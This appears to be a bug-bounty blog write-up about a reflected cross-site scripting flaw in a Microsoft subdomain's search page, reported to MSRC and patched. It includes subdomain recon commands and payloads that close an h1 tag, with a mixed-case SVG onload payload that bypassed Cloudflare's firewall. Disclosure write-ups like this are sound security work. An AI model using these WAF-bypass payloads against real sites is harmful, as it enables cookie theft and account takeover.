Cloudflare Bypass Leads to RXSS [Reflected Cross-Site Scripting] in Microsoft

Prince Roy (RoyzSec)
4 min read · Nov 9


Har Har Mahadev! This is Prince Roy, a security researcher, also known as royzsec. I am back with another write-up, this time about my latest finding [Cross-Site Scripting] on a Microsoft domain, found by bypassing Cloudflare. Are you curious about the whole process and my mindset while finding it?

So let’s start! As usual, I use subfinder to collect subdomains. But this time I collected subdomains from https://chaos.projectdiscovery.io/, where you can easily get up-to-date domain lists; they update their list every day.

Then, with httpx, I checked them and gathered all the live domains:

cat microsoftdomains.txt | httpx -mc 200 | tee microsoftlivedomains.txt

Then I checked every domain one by one. I guess it was on the fourth or fifth domain that I found this vulnerability. That domain's search functionality was vulnerable. So, as usual, I searched for “Hello”.

Then I looked at the page's view-source, because just throwing a payload at it will not work without knowing how the functionality behaves, and Microsoft domains are behind Cloudflare and use the cdnjs CDN [Content Delivery Network].

Source code of the search function:

<div class="search">

<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for Hello">Hello</h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>1 result</div>
</div>

So here, “Hello” was reflected inside the <h1> tag, and there was no filtering of the search input. Then I tried closing the </h1> and using normal payloads:

</h1><script>alert(document.cookie)</script>
</h1><img src=x onerror=confirm(document.cookie)>

But both times Cloudflare blocked me.

Then I tried my Brahmastra:

FUZZ</h1><Svg Only=1 OnLoad=confirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgUm95elNlYw=="))>

Because, most of the time, this payload has helped me bypass the WAF or Cloudflare in the past. When I tried this, guess what!!

Boom!! The code was injected successfully and popped up on the screen. Source code:

<div class="search">

<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)>">Hello</h1><Svg Only=1 OnLoad=confirm(document.cookie)></h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>0 result</div>
</div>

Closing the </h1> is what allowed the injection, and the mixed small and capital letters helped to bypass the firewall. Literally, I was like

I reported it quickly, and the next day the MSRC team accepted it as a valid issue.

And they patched it within one day. I tried again to bypass the fix, but this function is now pretty safe.

Code after the fix:

<div class="search">

<div class="search-header">
<h1 class="search-header__search-term" aria-label="Search results for hello"Svg Only=1 OnLoad=confirmatob"Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="">hello"Svg Only=1 OnLoad=confirmatob"Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="</h1>
<span class="search-header__line-break"></span>
<div
class="search-header__results-number"
id="search-range"><span class="sr-text"></span>0 result</div>
</div>

Priority: P2

Severity: Important

POC:

Impact:

  1. As an attacker, I can use this attack to steal the victim's cookie, which leads to ATO [Account Takeover].
  2. Disclosure of end-user files, redirecting the user to some other page or site, or modifying the presentation of content.

Finally, thanks for reading my small blog. If you like it, please share it with your friends and press the clap button for me; it inspires me a lot.

Please follow my social media platforms:

LinkedIn: https://www.linkedin.com/in/prince-roy-4b9a75187/

GitHub: https://github.com/royzsec

Twitter: https://twitter.com/royzsec



Prince Roy (RoyzSec)

Cyber Security Researcher | Ex-GPCSSI2021